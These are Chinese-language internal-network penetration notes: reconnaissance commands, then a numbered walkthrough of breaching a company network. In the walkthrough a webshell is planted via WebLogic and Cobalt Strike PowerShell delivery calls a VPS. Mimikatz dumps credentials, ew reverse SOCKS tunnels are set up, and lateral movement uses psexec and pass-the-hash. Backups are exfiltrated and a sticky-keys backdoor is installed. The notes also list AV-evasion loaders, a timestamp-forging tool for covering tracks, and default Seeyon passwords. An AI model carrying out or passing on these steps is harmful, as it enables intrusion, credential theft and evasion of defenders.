内网信息搜集
Windows常用搜集命令:
ipconfig /all |
查询网络配置信息 |
|---|---|
| systeminfo | findstr /B /C:”OS 名称” /C:”OS 版本” | 查询操作系统版本-中文 |
| systeminfo | findstr /B /C:”OS Name” /C:”OS Version” | 查询操作系统版本-英文 |
| echo %PROCESSOR_ARCHITECTURE% | 查看系统体系结构 |
| wmic product get name,version | 安装软件版本信息 |
| powershell “Get-WmiObject -class Win32_Product | Select-Object -Property name,version” | 收集软件版本信息 |
| wmic service list brief | 查询本机服务信息 |
tasklist /svc |
查询进程列表信息 |
| wmic startup get command,caption | 查看启动程序信息 |
| schtasks /query /fo LIST /v | 查看计划任务信息 |
| net statistics workstation | 查看主机开机时间 |
| net user | 查询用户列表信息 |
| net localgroup administrators | 获取本地管理员(通常含有域用户) |
| query user || qwinsta | 查看当前在线用户信息 |
| net session | 查客户端会话信息(管理员权限) |
netstat -ano |
查询端口列表信息 |
Systeminfo |
查询补丁列表信息 |
| wmic qfe get Caption,Description,HotFixID,InstalledOn | wmic来识别安装在系统中的补丁 |
net share |
查看本机共享信息 |
LINUX常用搜集命令:
ifconfig -a 或 ip a |
查询网络配置信息 |
|---|---|
uname -a |
查询系统内核及版本信息 |
cat /etc/os-release 或 lsb_release -a |
查询操作系统版本信息 |
arch 或 uname -m |
查看系统体系结构 |
dpkg -l (Debian/Ubuntu) 或 rpm -qa (RHEL/CentOS) |
安装软件版本信息 |
service --status-all 或 systemctl list-units --type=service |
查询本机服务信息 |
ps aux |
查询进程列表信息 |
ls /etc/init.d/ 或 ls /etc/systemd/system/ |
查看启动程序信息 |
crontab -l 或 ls /etc/cron.* |
查看计划任务信息 |
uptime |
查看主机运行时间 |
cat /etc/passwd |
查询用户列表信息 |
cat /etc/group |
获取用户组信息(包括管理员组) |
who 或 w |
查看当前在线用户信息 |
netstat -antp 或 ss -tulnp |
查询端口列表信息 |
apt list --installed (Debian/Ubuntu) 或 yum list installed (RHEL/CentOS) |
查询已安装软件包(包含部分补丁信息) |
ls /mnt/ 或 mount |
查看挂载的共享信息 |
df -h |
查看磁盘使用情况 |
free -h |
查看内存使用情况 |
lscpu |
查看CPU信息 |
dmidecode -t system |
查看系统硬件信息(需要root权限) |
journalctl -u <service_name> |
查看特定服务的日志信息 |
cat /etc/hosts |
查看主机名和IP映射 |
hostnamectl |
查看主机名和系统信息 |
注:
- 部分命令可能需要root权限才能获取完整信息(可在命令前加
sudo) - 不同Linux发行版可能需要使用对应的包管理命令(apt/yum/dnf等)
- 对于较新的系统,推荐使用
ip替代ifconfig,使用ss替代netstat
内存码的注入:
[内存马注入]: https://github.com/pap1rman/JNDIExploit-modify “参考如下:”
- https://github.com/veracode-research/rogue-jndi
- https://github.com/welk1n/JNDI-Injection-Exploit
- https://github.com/welk1n/JNDI-Injection-Bypass
完整的内网渗透
简略:
1.获取shell—无论是sql注入提权还是webshell还是直接ssh等,获取shell后
2.cs上线—下载powershell等工具或者jar直接上线
3.如上信息搜集,进行横向,域内横向,类似于操作1.直接找shell
(3).可以尝试sock代理,使同一网,进行msf的扫描,有的话就是捷径
(3).有备份的话可以直接拷贝全量备份,它能在你本地横?可以cmd覆盖
(3).基础操作:主机端口,内网web,系统/框架漏洞
(技巧)[https://www.cnblogs.com/backlion/category/1181220.html]
详细
1.通过fofa搜索到目标系统是采用weblogic框架,通过weblogic利用工具可执行命令,这里上传冰蝎一句话到目标网站系统。并查询到目标系统存在小众的防火墙,经测试该防火墙对ps脚本不拦截。
2.在VPS上通过cd自带的Scripted Web Delivery模块,直接创建一个web服务用于一键下载和执行powershell。
URL路径:/a/123 主机地址:目标系统IP 端口:80 监听器:https 类型:posershell
3.执行powershel,然后CS成功上线。
4.通过C命令查询目标系统信息,发现目标系统是win2012 ,目标内网IP为192.168.200.21
shell systeminfo
shell ipconfig
5。通过cs将ladon上传到目标系统中,通过ladon扫描内网系统.,发现目标有一个WEB服务主机。
landon 192.168.200.1/24 OsScan
6。通过mimikatz成功读取到用户名和密码hash值,通过md5对密码的NTML进行解密,成功解密为P@sssw0rd。
7,通过ladon进行批量ms17-010扫描,发现存有几个系统存在ms17-010漏洞
landon 192.168.200.1/24 MS17010
8.在公网VPS上执行以下命令,将1900端口收到的代理请求转交给反连1200端口的主机
ew -s rcsocks -l 1900 -e 1200
9.将ew通过冰蝎上传目标系统中,并执行以下命令,开启目标主机socks5服务并反向连接到中转机器的1200端口
ew -s rssocks -d xxx.xxx.xxx.xxx(公网VPS IP) -e 1200
10.本地WINDOWS在本地使用sockscap配置好socke5代理,本地虚拟机里面的kali的MSF,kali的代理配置比较方便,先vim /etc/proxychains.conf ,添加sock5嗲了
socks5 目标IP 1900
11.在kali下msf要挂代理,就直接:proxychains msfconsole,在windows中sockscap添加ie浏览器访问的socks5代理,用于内网web访问,但是测试弱口令发现无法进入。
12.继续信息收集,查看登录凭证,并有任何东西
shell cmdkey /l
13.查看共享计算机列表,并尝试访问计算机C盘,发现备份计算机可以访问共享
shell ne view
ls \VEEAM-BACKUP$
14.通过ping目标共享计算机,查询出IP地址为192.168.200.6
ping VEEAM-BACKUP
15.在CS上创建一个监听器
中转—监听—名字(c2)、payload(windows/beacon_reverse_tcp)、listen host :192.168.200.21 、listen port:4444
16.接着使用psexec_psh尝试上线192.168.200.6这台服务器,成功上线,起初发现该主机上并没有任何东西
jump psexec _psh 192.168.200.6
17.通过之前ladon探测发现内网中22,1,5,11主机是linux系统,尝试弱口令,发现192.168.200.22存在弱口令,linux主机上并没有任何可利用的
ssh 192.168.200.22 root 123456
18.在VEEAM-BACKUP主机上发现了有一个Backup的文件,里面存放了三个机器的备份,它是一款叫Veeam® Backup & Replication的软件,他的功能是专门为Vsphere等做备份。
19.发现VEEAM-BACKUP不出外网,这里通过7z将Backup文件进行命令打包压缩。在目标系统中的web目录下,通过命令共享将Backup文件拷贝到目标系统中。
19.在本地安装Backup & Replication,并将备份文件进行恢复还原,发现登录窗口处有默认的用户名和密码以及IP,这个需要在目标内网中登录,这里可以通过在目标系统中通过cs开启sock4代理,本地通过Proxifier加载Backup & Replication的sock4代理成功访问。
20.本地下载的那个全量备份在本地还原也很简单,只需要装了软件双击就回自动打开软件进行还原
21.通过老毛桃的win pe进入系统,这里重命名cmd.exe为osk.exe将原来C盘中的\windows\system32\osk.exe给覆盖了,这样子在开机的时候打开屏幕键盘就会弹出SYSTEM权限的命令行。
22.通过命令查询,发现还原的系统是域普通主机,这里通过命令添加用并将域用户修改密码后添加到本地管理员组成功进入了系统。
net user hanli quer1345 @ /add
net localgroup administrators hanli /add
23.在虚拟机中通过执行cs的后门成功上线,并通过cs的hasdump读取hash,并通过该hash进行域控HASH传递
免杀项目:
https://github.com/wangfly-me/LoaderFly
https://github.com/Pizz33/Qianji
可以定期去github上关注一些好用的bof
应对技巧:
1.上传的木马都是新的
可以查看更改时间和最近操作得到,得到直接保存沙盒删除溯源一条龙
注:https://github.com/MsF-NTDLL/ChTimeStamp
该项目可以实现修改文件时间
默认口令:
系统管理员:system/system
集团管理员(A8-v5集团版) group-admin/123456
单位管理员(A8-V5企业版) admin1/admin123456
审计管理员(所有版本) audit-admin/seeyon123456